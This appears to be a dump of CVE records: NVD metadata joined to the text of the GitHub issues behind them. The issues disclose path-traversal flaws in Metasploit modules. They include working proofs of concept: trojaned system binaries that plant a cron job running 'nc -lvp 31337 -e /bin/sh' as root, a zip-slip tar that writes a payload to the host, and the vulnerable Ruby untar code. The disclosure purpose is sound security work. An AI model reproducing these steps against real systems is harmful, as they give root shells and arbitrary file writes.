"3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@rapid7.com", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rapid7/metasploit-framework/issues/14008" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/rapid7/metasploit-framework/issues/14008" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:*", "matchCriteriaId": "AE440BD0-9B8F-49A8-BF37-85B8DC3CEDCB", "versionEndExcluding": "6.0.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.11.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/rapid7/metasploit-framework/issues/14008
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "rapid7", "metasploit-framework" ]
On the victim-soon-to-be-attacker host - create some fun executables : ``` root@linux-mint-19-3-amd64:/bin# ls -la /bin/cat* -rwxr-xr-x 1 root root 128 Aug 17 19:37 /bin/cat -rwxr-xr-x 1 root root 35064 Aug 17 19:17 /bin/cat.backup root@linux-mint-19-3-amd64:/bin# ls -la /usr/bin/sudo* -rwsr-xr-x 1 root root 103 Aug 17 19:34 /usr/bin/sudo -rwsr-xr-x 1 root root 149080 Aug 17 19:02 /usr/bin/sudo.backup lrwxrwxrwx 1 root root 4 Jan 12 2020 /usr/bin/sudoedit -> sudo -rwxr-xr-x 1 root root 56128 Oct 11 2019 /usr/bin/sudoreplay root@linux-mint-19-3-amd64:/bin# ls -la /bin/ls* -rwxr-xr-x 1 root root 119 Aug 17 19:34 /bin/ls -rwxr-xr-x 1 root root 133792 Aug 17 19:01 /bin/ls.backup -rwxr-xr-x 1 root root 84048 Aug 23 2019 /bin/lsblk lrwxrwxrwx 1 root root 4 Jan 12 2020 /bin/lsmod -> kmod ``` ``` root@linux-mint-19-3-amd64:/bin# cat /bin/cat #!/bin/bash if [[ "${@}" == "lol" ]]; then echo "* * * * * root nc -lvp 31337 -e /bin/sh" exit fi /bin/cat.backup "${@}" root@linux-mint-19-3-amd64:/bin# cat /usr/bin/sudo #!/bin/bash if [[ "${@}" =~ "-u ../../" ]]; then echo "lol" exit fi /usr/bin/sudo.backup "${@}" root@linux-mint-19-3-amd64:/bin# cat /bin/ls #!/bin/bash if [[ "${@}" =~ "/Users" ]]; then echo "../../../../../../etc/cron.d/" exit fi /bin/ls.backup "${@}" root@linux-mint-19-3-amd64:/bin# ``` On the attacker-soon-to-be-the-victim host - start a multi handler like any other day: ``` [*] Using configured payload generic/shell_reverse_tcp payload => linux/x64/meterpreter/reverse_tcp lhost => 172.16.191.165 lport => 1337 exitonsession => false [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 172.16.191.165:1337 ``` On the victim-soon-to-be-attacker host - give the "attacker" a shell in a root user namespace: ``` user@linux-mint-19-3-amd64:~$ unshare -r ./reverse.x64.1337.elf ``` On the attacker-soon-to-be-the-victim host - enjoy the new shell and enumerate some host info with `post/osx/gather/enum_osx` (also check there's no funny cron jobs or anything listening on `31337`, because that would be bad) : ``` msf6 exploit(multi/handler) > [*] Sending stage (3008420 bytes) to 172.16.191.152 [*] Meterpreter session 1 opened (172.16.191.165:1337 -> 172.16.191.152:44626) at 2020-08-17 05:41:29 -0400 msf6 exploit(multi/handler) > use post/osx/gather/enum_osx msf6 post(osx/gather/enum_osx) > set session 1 session => 1 msf6 post(osx/gather/enum_osx) > cat /etc/cron.d/lol [*] exec: cat /etc/cron.d/lol cat: /etc/cron.d/lol: No such file or directory msf6 post(osx/gather/enum_osx) > lsof -i :31337 [*] exec: lsof -i :31337 msf6 post(osx/gather/enum_osx) > run [!] SESSION may not be compatible with this module. [*] Running module against 172.16.191.152 [*] This session is running as root! [*] Saving all data to /root/.msf4/logs/post/enum_osx/172.16.191.152_20200817.4152 [*] Enumerating OS [*] Enumerating Network [*] Enumerating Bluetooth [*] Enumerating Ethernet [*] Enumerating Printers [*] Enumerating USB [*] Enumerating Airport [*] Enumerating Firewall [*] Enumerating Known Networks [*] Enumerating Applications [*] Enumerating Development Tools [*] Enumerating Frameworks [*] Enumerating Logs [*] Enumerating Preference Panes [*] Enumerating StartUp [*] Enumerating TCP Connections [*] Enumerating UDP Connections [*] Enumerating Environment Variables [*] Enumerating Last Boottime [*] Enumerating Current Activity [*] Enumerating Process List [*] Enumerating Users [*] Enumerating Groups [*] Extracting history files [*] Enumerating and Downloading keychains for ../../../../../../etc/cron.d/ [*] Post module execution completed msf6 post(osx/gather/enum_osx) > echo that is not at all unsettling ... [*] exec: echo that is not at all unsettling ... that is not at all unsettling ... msf6 post(osx/gather/enum_osx) > ls -la ../../../../../../etc/cron.d/ [*] exec: ls -la ../../../../../../etc/cron.d/ total 48 drwxr-xr-x 2 root root 4096 Aug 17 05:41 . drwxr-xr-x 229 root root 12288 Aug 17 05:40 .. -rw-r--r-- 1 root root 285 Nov 29 2018 anacron -rw-r--r-- 1 root root 201 Jul 25 2019 e2scrub_all -rw-r--r-- 1 root root 469 Jan 7 2019 geoipupdate -rw-r--r-- 1 root root 607 Mar 9 2016 john -rw-r--r-- 1 root root 40 Aug 17 05:41 lol -rw-r--r-- 1 root root 712 Jan 4 2018 php -rw-r--r-- 1 root root 102 Oct 3 2017 .placeholder -rw-r--r-- 1 root root 396 Dec 23 2017 sysstat msf6 post(osx/gather/enum_osx) > cat /etc/cron.d/lol [*] exec: cat /etc/cron.d/lol * * * * * root nc -lvp 31337 -e /bin/sh msf6 post(osx/gather/enum_osx) > lsof -i :31337 [*] exec: lsof -i :31337 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME nc 2495846 root 3u IPv6 16635489 0t0 TCP *:31337 (LISTEN) nc 2495846 root 4u IPv4 16635490 0t0 TCP *:31337 (LISTEN) msf6 post(osx/gather/enum_osx) > ``` On the victim-soon-to-be-the-attacker host: ``` user@linux-mint-19-3-amd64:~$ nc 172.16.191.165 31337 -v Connection to 172.16.191.165 31337 port [tcp/*] succeeded! id uid=0(root) gid=0(root) groups=0(root) pwd /root ``` After patch (#14007): ``` msf6 post(osx/gather/enum_osx) > edit lib/msf/core/post/file.rb [*] Reloading /root/Desktop/metasploit-framework/lib/msf/core/post/file.rb msf6 post(osx/gather/enum_osx) > rexploit [*] Reloading module... [!] SESSION may not be compatible with this module. [*] Running module against 172.16.191.152 [*] This session is running as root! [*] Saving all data to /root/.msf4/logs/post/enum_osx/172.16.191.152_20200817.3944 [*] Enumerating OS [*] Enumerating Network [*] Enumerating Bluetooth [*] Enumerating Ethernet [*] Enumerating Printers [*] Enumerating USB [*] Enumerating Airport [*] Enumerating Firewall [*] Enumerating Known Networks [*] Enumerating Applications [*] Enumerating Development Tools [*] Enumerating Frameworks [*] Enumerating Logs [*] Enumerating Preference Panes [*] Enumerating StartUp [*] Enumerating TCP Connections [*] Enumerating UDP Connections [*] Enumerating Environment Variables [*] Enumerating Last Boottime [*] Enumerating Current Activity [*] Enumerating Process List [*] Enumerating Users [*] Enumerating Groups [*] Extracting history files [*] Enumerating and Downloading keychains for ../../../../../../etc/cron.d/ [-] Post failed: Errno::ENOENT No such file or directory @ rb_sysopen - /root/.msf4/logs/post/enum_osx/172.16.191.152_20200817.3944//etc/cron.d/lol [-] Call stack: [-] /usr/lib/ruby/2.7.0/fileutils.rb:1150:in `initialize' [-] /usr/lib/ruby/2.7.0/fileutils.rb:1150:in `open' [-] /usr/lib/ruby/2.7.0/fileutils.rb:1150:in `rescue in block in touch' [-] /usr/lib/ruby/2.7.0/fileutils.rb:1146:in `block in touch' [-] /usr/lib/ruby/2.7.0/fileutils.rb:1144:in `each' [-] /usr/lib/ruby/2.7.0/fileutils.rb:1144:in `touch' [-] /root/Desktop/metasploit-framework/lib/msf/core/post/file.rb:269:in `file_local_write' [-] /root/Desktop/metasploit-framework/modules/post/osx/gather/enum_osx.rb:379:in `block (2 levels) in get_keychains' [-] /root/Desktop/metasploit-framework/modules/post/osx/gather/enum_osx.rb:374:in `each' [-] /root/Desktop/metasploit-framework/modules/post/osx/gather/enum_osx.rb:374:in `block in get_keychains' [-] /root/Desktop/metasploit-framework/modules/post/osx/gather/enum_osx.rb:371:in `each' [-] /root/Desktop/metasploit-framework/modules/post/osx/gather/enum_osx.rb:371:in `get_keychains' [-] /root/Desktop/metasploit-framework/modules/post/osx/gather/enum_osx.rb:48:in `run' [*] Post module execution completed msf6 post(osx/gather/enum_osx) > ```
post/osx/gather/enum_osx: permits remote command execution on Metasploit host
https://api.github.com/repos/rapid7/metasploit-framework/issues/14008/comments
4
2020-08-17T10:00:48Z
2020-08-21T15:06:10Z
https://github.com/rapid7/metasploit-framework/issues/14008
680,108,459
14,008
1,398
CVE-2020-7377
2020-08-24T19:15:10.837
The Metasploit Framework module "auxiliary/admin/http/telpho10_credential_dump" module is affected by a relative path traversal vulnerability in the untar method which can be exploited to write arbitrary files to arbitrary locations on the host file system when the module is run on a malicious HTTP server.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "cve@rapid7.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@rapid7.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/rapid7/metasploit-framework/issues/14015" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/rapid7/metasploit-framework/issues/14015" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rapid7:metasploit:*:*:*:*:*:*:*:*", "matchCriteriaId": "A6C57088-B29C-4383-BC60-42ECE0C9326C", "versionEndExcluding": "6.0.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.12.40", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/rapid7/metasploit-framework/issues/14015
[ "Exploit", "Third Party Advisory" ]
github.com
[ "rapid7", "metasploit-framework" ]
The `untar` method in the `auxiliary/admin/http/telpho10_credential_dump` module is vulnerable to directory traversal resulting in arbitrary file write. This can be used to achieve remote command execution on the Metasploit host from a remote malicious webserver masquerading as a Telpho10 system. # Vulnerable Code ```ruby # Used for unpacking backup files def untar(tarfile) destination = tarfile.split('.tar').first FileUtils.mkdir_p(destination) File.open(tarfile, 'rb') do |file| Rex::Tar::Reader.new(file) do |tar| tar.each do |entry| dest = File.join destination, entry.full_name # <-- TAR file name used as destination path for file write if entry.file? File.open(dest, 'wb') do |f| f.write(entry.read) # <-- file contents are written to destination path end File.chmod(entry.header.mode, dest) end end end end return destination end ``` # PoC ``` msf6 > use multi/fileformat/zip_slip [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp msf6 exploit(multi/fileformat/zip_slip) > set TARGETPAYLOADPATH ../../../../../../../payload.bin TARGETPAYLOADPATH => ../../../../../../../payload.bin msf6 exploit(multi/fileformat/zip_slip) > run [+] msf.tar stored at /root/.msf4/local/msf.tar [*] When extracted, the payload is expected to extract to: [*] ../../../../../../../payload.bin msf6 exploit(multi/fileformat/zip_slip) > mkdir /var/www/html/telpho/ [*] exec: mkdir /var/www/html/telpho/ msf6 exploit(multi/fileformat/zip_slip) > mkdir /var/www/html/telpho/system [*] exec: mkdir /var/www/html/telpho/system msf6 exploit(multi/fileformat/zip_slip) > mkdir /var/www/html/telpho/temp [*] exec: mkdir /var/www/html/telpho/temp msf6 exploit(multi/fileformat/zip_slip) > Interrupt: use the 'exit' command to quit msf6 exploit(multi/fileformat/zip_slip) > touch /var/www/html/telpho/system/backup.php [*] exec: touch /var/www/html/telpho/system/backup.php msf6 exploit(multi/fileformat/zip_slip) > mv /root/.msf4/local/msf.tar /var/www/html/telpho/temp/telpho10.epb [*] exec: mv /root/.msf4/local/msf.tar /var/www/html/telpho/temp/telpho10.epb msf6 exploit(multi/fileformat/zip_slip) > use auxiliary/admin/http/telpho10_credential_dump msf6 auxiliary(admin/http/telpho10_credential_dump) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 msf6 auxiliary(admin/http/telpho10_credential_dump) > service apache2 start [*] exec: service apache2 start msf6 auxiliary(admin/http/telpho10_credential_dump) > ls -la /payload.bin [*] exec: ls -la /payload.bin ls: cannot access '/payload.bin': No such file or directory msf6 auxiliary(admin/http/telpho10_credential_dump) > run [*] Running module against 127.0.0.1 [*] Generating backup [*] Downloading backup [+] File saved in: /root/.msf4/loot/20200818043126_default_127.0.0.1_telpho10.backup_834653.tar [-] Could not unpack files. [*] Auxiliary module execution completed msf6 auxiliary(admin/http/telpho10_credential_dump) > ls -la /payload.bin [*] exec: ls -la /payload.bin -rwxrwxrwx 1 root root 207 Aug 18 04:31 /payload.bin msf6 auxiliary(admin/http/telpho10_credential_dump) > file /payload.bin [*] exec: file /payload.bin /payload.bin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, no section header msf6 auxiliary(admin/http/telpho10_credential_dump) > tar --list -f /root/.msf4/loot/20200818043126_default_127.0.0.1_telpho10.backup_834653.tar [*] exec: tar --list -f /root/.msf4/loot/20200818043126_default_127.0.0.1_telpho10.backup_834653.tar tar: Removing leading `../../../../../../../' from member names ../../../../../../../payload.bin ```
auxiliary/admin/http/telpho10_credential_dump: `untar` method is vulnerable to directory traversal resulting in arbitrary file write on the Metasploit host
https://api.github.com/repos/rapid7/metasploit-framework/issues/14015/comments
3
2020-08-18T08:48:55Z
2020-08-25T13:35:54Z
https://github.com/rapid7/metasploit-framework/issues/14015
680,816,703
14,015
1,399
CVE-2020-24616
2020-08-25T18:15:11.133
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPDataSource (aka Anteros-DBCP).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2814" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0006/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2814" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200904-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "8395437B-348F-4291-B79B-2794C1A0B560", "versionEndExcluding": "2.9.10.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:*", "matchCriteriaId": "F3E0B672-3E06-4422-B2A4-0BD073AEC2A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:*", "matchCriteriaId": "B55E8D50-99B4-47EC-86F9-699B67D473CE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "A125E817-F974-4509-872C-B71933F42AD1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "97994257-C9A4-4491-B362-E8B25B7187AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_liquidity_management:14.2:*:*:*:*:*:*:*", "matchCriteriaId": "B7FC2BF9-B6D7-420E-9CF5-21AB770B9CC1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_liquidity_management:14.3:*:*:*:*:*:*:*", "matchCriteriaId": "D4DAB919-54FD-48F8-A664-CD85C0A4A0E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_liquidity_management:14.5:*:*:*:*:*:*:*", "matchCriteriaId": "9D5A1417-2C59-431F-BF5C-A2BCFEBC95FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_supply_chain_finance:14.2:*:*:*:*:*:*:*", "matchCriteriaId": "1D99F81D-61BB-4904-BE31-3367D4A98FD1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_supply_chain_finance:14.3:*:*:*:*:*:*:*", "matchCriteriaId": "93866792-1AAE-40AE-84D0-21250A296BE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_supply_chain_finance:14.5:*:*:*:*:*:*:*", "matchCriteriaId": "45AB3A29-0994-46F4-8093-B4A9CE0BD95F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:*", "matchCriteriaId": "D0DBC938-A782-433F-8BF1-CA250C332AA7", "versionEndExcluding": "21.1.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "5D55AB36-EDBB-4644-9579-21CE8278ED77", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "AB1BC31C-6016-42A8-9517-2FBBC92620CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "AE6D7E4F-FB11-4CED-81DB-D0BD21797C53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "0331877D-D5DB-4EE8-8220-C1CDC3F90CB0", "versionEndExcluding": null, "versionEndIncluding": "8.2.4.0", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "C4A94B36-479F-48F2-9B9E-ACEA2589EF48", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", "matchCriteriaId": "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_offline_mediation_controller:12.0.0.3:*:*:*:*:*:*:*", "matchCriteriaId": "A23B00C1-878A-4B55-B87B-EFFFA6A5E622", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_policy_management:12.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "5312AC7A-3C16-4967-ACA6-317289A749D0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "A28F42F0-FBDA-4574-AD30-7A04F27FEA3E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "062E4E7C-55BB-46F3-8B61-5A663B565891", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "FB3E2625-08F0-4C8E-B43F-831F0290F0D7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2.1", "versionStartExcluding": null, "versionStartIncluding": "8.0.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", "matchCriteriaId": "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:identity_manager_connector:11.1.1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "9D7EA92D-9F26-4292-991A-891597337DFD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*", "matchCriteriaId": "0D9E0011-6FF5-4C90-9780-7A1297BB09BF", "versionEndExcluding": null, "versionEndIncluding": "21.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, 